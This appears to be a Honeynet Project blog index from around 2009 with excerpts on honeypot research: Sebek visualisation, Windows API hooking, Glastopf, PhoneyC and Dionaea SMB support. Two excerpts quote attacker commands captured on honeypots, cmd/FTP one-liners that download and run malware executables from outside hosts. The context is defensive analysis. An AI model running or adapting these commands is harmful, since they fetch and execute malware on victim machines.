To learn the tools, tactics and motives involved in computer and network attacks, and share the lessons learned.

Blogs

Sebek Visualizer-Current Progress

Since my last update, I've separated the visualizations by IP address, along with adding a few cosmetic additions (lines to the next event in the height different experiment), although there's still a little bit of work to separate that visualization into different IPs.  I've also added camera controls, the basic WSAD at the moment, so that a user can scroll up, down, left, and right, depending on how many host machines there are, as well as how many events there are.  There was also some work on the backend as well, to make the files a little easier to read, as well as adding more commen

PaulDotCom

Last week I had the honor of being interviewed by the sharp team at PaulDotCom, in which they quized me extensively about honeypots and honeypot technology.  I have had the chance to work with John Strands of the team, who is one of the best penetration testers I know, he really knows his stuff and creates great demonstration hacking videos.  If you have a chance, check it out, they are smart group of fun guys.
 
 http://pauldotcom.com/2009/07/pauldotcom-security-weekly---e-19.html

NtDeviceIoControlFile

As the console spy is almost finished, the next stage is mainly for network activities. Sebek Win32 version uses TDI hook to get this done. However, since getting driver object in virtualization layer is hard and TDI is TDI is on the path to deprecation, I need to find another way. The best solution seems to be hooking NtDeviceIoControlFile, the API Windows uses to do network related stuff and has been widely mentioned in malware behavior analysis papers. After some days of searching, I encounter a very useful resources today, a master thesis from TTAnalyze team:
 

Iteolih: malicious ftp services

Yesterday, I got an incomplete, but successful, attack on my honeypot, the attackers remote code execution looked like this:

WinExec("cmd /c echo open 78.1.96.200 4871 > o&echo user 1 1 >> o &echo get msq16.exe >> o")
ExitThread(0)

As the required part to download the malware to the remotehost was incomplete, I got curious and wanted a copy.

Spanish Chapter Status Report For 2008

ORGANIZATION
The Spanish Honeynet Project chapter primary areas of interest and development are wireless honeynets, web honeypots, data collecting and analyzing and research technical papers to inform the community. Our current members are:

Glastopf's new vulnerability emulator

The number of attacks against the Webhoneypot depends strongly on his PHP parser. So keeping the pattern matching mechanism up to date was one of the major future works. One of my goals for the Google Summer of Code time is to improve the parser and to reduce upcoming changes in attack patterns. The old parser was very simple: collect all lines containing echo calls, look for known patterns and generate the appropriate response.

Iteolih: If you can't touch it ...

While playing with the current hsoc code, I got attacked, and saw an offer to download something from somewhere.

cmd /c echo open v1.usbupdatestrings.at 4356 > i&echo user ik ik >> i &echo binary >> i &echo get Ms07.exe >> i &echo quit >> i &ftp -n -s:i &Ms07.exe

Visualization Experiments

Most of my work in the past few weeks has been focusing on the visualization aspect of the project.  One thing that I am trying to avoid is simply making graphs/charts and that sort of visualization.  Those sorts of things are incredibly useful since anyone can understand them, on the other hand they're trivial to make.  I've been making a few basic visualizations, but the two that, so far, have the most merit are delinating the events based on color (each group of events is a separate color) and the other separates them based on height (each y position is a different event).  I'll admi

A review to what we have done yet

Our work mainly focuses on DOM simulation. I believe the following is the most important for deobfuscation, but we also do lot more so that our program can handle normal web pages. We will not list them here.
Our code can be found at:
http://code.google.com/p/phoneyc/source/browse/phoneyc#phoneyc/branches/phoneyc_wanggeng
1. DOM tree generation.

Iteolih: SMB/RPC efforts

During the last weeks I have been working on SMB and specifically DCERPC support for the Dionaea next generation low-interaction honeypot (buzz!).

SMB / CIFS is a huge protocol with several protocol versions and a lot of message types. The CIFS technical reference and the Implementing CIFS book have been constant companions for me since the beginning of the project.

Syndicate content